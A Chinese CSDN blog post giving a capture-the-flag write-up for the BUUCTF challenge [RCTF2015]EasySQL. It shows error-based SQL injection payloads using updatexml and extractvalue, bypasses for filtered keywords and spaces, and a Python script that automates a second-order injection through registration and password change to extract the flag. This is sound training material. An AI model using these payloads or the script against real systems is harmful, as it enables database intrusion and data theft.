[BUUCTF] 集训第八天

最新推荐文章于 2024-06-14 08:29:33 发布
最新推荐文章于 2024-06-14 08:29:33 发布
阅读量277 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dannie01/article/details/120634658
版权

SQL报错注入 updatexml extractvalue 正则表达式 数据库安全
关键词由CSDN通过智能技术生成

[RCTF2015]EasySQL

测试找一下报错
在这里插入图片描述
在这里插入图片描述
点击用户名查看到信息,可以改密码
在这里插入图片描述修改密码发现报错信息在user处,

猜测sql语句 select * from user where username=" " and pwd=' '

or被过滤,可以使用||
空格被过滤了,可以用()

fuzz一下,updatexmlextravalue均可利用

这里使用报错注入构造payload
在这里插入图片描述

  • 报错注入

知识点: 十种Mysql报错注入

  • updatexml

爆库

j1a"||updatexml(1,concat(0x7e,(select(database())),0x7e),1)#

在这里插入图片描述

爆表

j1a"||updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)#

在这里插入图片描述

爆字段
不在flag表里,别被骗了

j1a"||updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1)#

在这里插入图片描述

j1a"||updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users))),1)#

查不到

  • 正则匹配搜索

知识点: Mysql中正则表达式Regexp常见用法

j1a"||updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1)#

不完整
在这里插入图片描述- 过滤了right、left,用reverse逆序输出

j1a"||updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1)#

在这里插入图片描述再脚本正序输出+拼接

list = ":}c8d139b3f173-beeb-1f04-86c8-7d"
list = list[::-1]

print(list)

#:flag{f5be28d7-8c68-40f1-beeb-37

#            d7-8c68-40f1-beeb-371f3b931d8c}:

#flag{f5be28d7-8c68-40f1-beeb-371f3b931d8c}

汇总请求+脚本学习:

import requests

url_reg = 'http://863dd33d-4fd1-4215-b5ad-c6c925288a91.node4.buuoj.cn:81/register.php'
url_log = 'http://863dd33d-4fd1-4215-b5ad-c6c925288a91.node4.buuoj.cn:81/login.php'
url_change = 'http://863dd33d-4fd1-4215-b5ad-c6c925288a91.node4.buuoj.cn:81/changepwd.php'

pre = 'j1a"'
tail = "'))),1))#"

s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)

r = requests.session()

def register(name):
	data = {
		'username' : name,
		'password' : '123',
		'email' : '123',
	}
	r.post(url=url_reg, data=data)

def login(name):
	data = {
		'username' : name,
		'password' : '123',
	}
	r.post(url=url_log, data=data)
	
def changepwd():
	data = {
		'oldpass' : '',
		'newpass' : '',
	}
	kk = r.post(url=url_change, data=data)
	if 'target' not in kk.text:
		print(kk.text)

for i in s:
	paylaod = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + tail
	register(paylaod)
	login(paylaod)
	changepwd()

这里一把梭匹配有flag字段的搜索

  • extravalue
j1a"||(extractvalue(1,concat(0x7e,(select(database())),0x7e)));#

j1a"||(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e)));#

j1a"||(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),0x7e)));#

j1a"||(extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where((real_flag_1s_here)regexp('^f'))),0x7e)));#		

j1a"||(extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where((real_flag_1s_here)regexp('^f')))),0x7e)));#

J1A
关注
专栏目录
BUUCTF:[RCTF2015]EasySQL
末初的CSDN博客
03-29 3861
BUUCTF:[RCTF2015]EasySQL 参考:https://www.cnblogs.com/peri0d/p/11599643.html 先注册一个用户 在注册的时候,fuzz测试发现在username和email中过滤了以下字符: @ or and space(空格) substr mid left right handle 没有源码慢慢测试....... 登录,发现还有个改密...
[BUU刷题记录]day01-起步
anwen12的博客
12-13 4859
BUU-WEB 这是一个菜鸡的蜕变 先小记录一下题目环境部署必备的docker安装 sudo apt-get remove docker docker-engine docker.io containerd runc sudo apt-get update sudo apt-get install apt-transport-https ca-certificates curl gnupg lsb-release curl -fsSL https://download.docker.com/linux
[BUUCTF] 集训第七天
Dannie01的博客
10-04 585
[CISCN2019 华北赛区 Day1 Web1]Dropbox 任意文件下载 phar反序列化 知识点 在下载的时候可以通过抓包修改文件名filename=…/…/index.php //class.php <?php error_reporting(0); $dbaddr = "127.0.0.1"; $dbuser = "root"; $dbpass = "root"; $dbname = "dropbox"; $db = new mysqli($dbaddr, $dbuser, $db
[BUUCTF] 集训第六天
Dannie01的博客
10-03 1468
[BSidesCF 2019]Futurella 火星文 复制粘贴搜索框就可以获得flag 看源码 轻易得不敢copy flag [GYCTF2020]FlaskApp 这里会自动重定向到xss平台,很迷 flask debug可以找到源码 flasky 尝试ssti模板注入 先重定向 点击返回拿到base64编码去解码 同理点击+返回操作 {{7*7}}不可以 {{7+7}}可以 别问为什么 有waf 读app.py {% for c in [].__class__.__base__.__
[BUUCTF] 集训第四天
Dannie01的博客
10-01 429
[De1CTF 2019]SSRF Me 打开就是乱七八糟的py源码,没有工具,自己缩进,所以要提升代码审计能力,不仅是php还有py 源码 #! /usr/bin/env python # #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.se
[BUUCTF] 集训第五天
Dannie01的博客
10-02 544
[MRCTF2020]PYWebsite 查看源码 function enc(code){ hash = hex_md5(code); return hash; } function validate(){ var code = document.getElementById("vcode").value; if (code != ""){ if(hex_md5(code) == "0cd4da0223c0b280829
[BUUCTF] 集训第一天
Dannie01的博客
09-29 368
[网鼎杯 2020 朱雀组]phpweb 1 [安洵杯 2019]easy_web 1 打开注意到img值 选正确且最强的解码工具解码 两次base64解码+hex转str hackbar解码 有获取文件内容功能,尝试编码获取index. php 最强base64工具获取图片base解密信息,拿到index.php关键源码 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;char
【ZJNU】Web集训
lllwky的博客
04-17 489
前言 这次的web集训几乎web的各种题型都涉及到了,在这里做一个整理。 1:攻防世界 cookie 打开网页按F12查看cookie,打开存储,发现有网页cookie.php [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rH57hXom-1650159967094)(https://raw.githubusercontent.com/lllwky/botany/main/img/image-20220410094243234.png)] 我们去访问 [外链图片转存失败,
2021 rois暑假集训——栈溢出与简单的rop链(buuctf练习)
weixin_56780239的博客
08-07 1300
2021年暑假参加集训,在buuctf上做的几道题的writeup.
火线100天2016中考数学复习集训第8讲一元一次不等式组
08-19
《火线100天2016中考数学复习集训第8讲一元一次不等式组》的课程主要涵盖了不等式的基本概念、性质、解法以及在实际问题中的应用。首先,不等式是指用不等号连接的式子,其解集是使不等式成立的未知数的取值范围。...
火线100天广西专版2016中考数学复习集训第8讲一元一次不等式组
08-19
【一元一次不等式】 一元一次不等式是初中数学中的核心知识点,主要研究含有一个未知数的一次不等式。2016年中考数学复习中,一元一次不等式的解法是重点,涉及的主要内容包括:去分母、去括号、移项、合并同类项...
8天集训营课件.zip
05-06
第八天:实战项目 最后一天,学员将进行一个实际的编程项目,综合运用所学知识解决实际问题,巩固和深化理解。可能的项目包括数据分析、网页爬虫或简单的游戏开发。 通过这8天的集训,学员不仅会掌握Python的基础...
火线100天2016中考数学复习集训第6讲一次方程组
08-19
以上是对“火线100天2016中考数学复习集训第6讲一次方程组”涉及的数学知识点的详细解释,包括等式性质、方程概念、一元一次方程的解法、二元一次方程组及其解法,以及如何将这些知识应用于实际问题中。这个知识点...
2024年全国青少信息素养大赛图形化编程复赛集训第八天编程题分享
最新发布
IT_Scratch的博客
06-14 190
a.运动模块:角色的平移、旋转、控制运动方向、碰到边缘 反弹等积木,了解平面直角坐标系和坐标的表示,使用坐标确定 角色的位置。1、图形化编程软件的使用:熟悉图形化编程软件中舞台区、角色列表区、功能区、脚本编 -3- 辑区的功能及使用。1、图形化编程软件的使用:熟悉图形化编程软件中舞台区、角色列表区、功能区、脚本编 辑区的功能及使用。随机数和字符的处理。a.运动模块:角色的平移、旋转、控制运动方向、碰到边缘 反弹、坐标等积木。b.外观模块:对角色说、颜色、大小、显示、隐藏等常用积 木块。
【TCP/IP详解(I)】四层协议概述
热门推荐
Dannie01的博客
08-09 1万+
网络分层 网络协议通常分不同层次进行开发,每一层分别负责不同的通信功能。一个协议族,比如TCP/IP,是一组不同层次上的多个协议的组合。TCP/IP通常被认为是一个四层协议系统 每一层负责不同的功能,从底层向上分别是: (1) 链路层 有时也称作数据链路层或网络接口层, 通常包括操作系统中的设备驱动程序和计算机中对应的网络接口卡。 它们一起处理与电缆(或其他任何传输媒介)的物理接口细节。 (2) 网络层 有时也称作互联网层,处理分组在网络中的活动,例如分组的选路。 在TCP/IP协议族中,网络层协议包括
[BUUCTF] 备赛刷题第一天
Dannie01的博客
11-01 2257
[极客大挑战 2019]RCE ME Wallbreaker_Easy 绕过disabled function 狠简单 一把嗦 [SUCTF 2019]EasyWeb <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_ex
[BUUCTF] 备赛刷题第二天
Dannie01的博客
11-03 1882
刷题目录[WUSTCTF2020]CV Maker[RootersCTF2019]I_<3_Flask拓宽思路 多多尝试常见SSTI的payload收集官方漏洞利用方法WAF绕过新姿势:[CISCN2019 华东南赛区]Double Secret做题思路总结[NPUCTF2020]ezinclude【预期解】【非预期解】做题思路总结 [WUSTCTF2020]CV Maker 漏洞源码: from flask import Flask, render_template_string, request
[BUUCTF] 备赛刷题第四天
Dannie01的博客
11-05 1295
[红明谷CTF 2021]write_shell 源码 <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }els
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值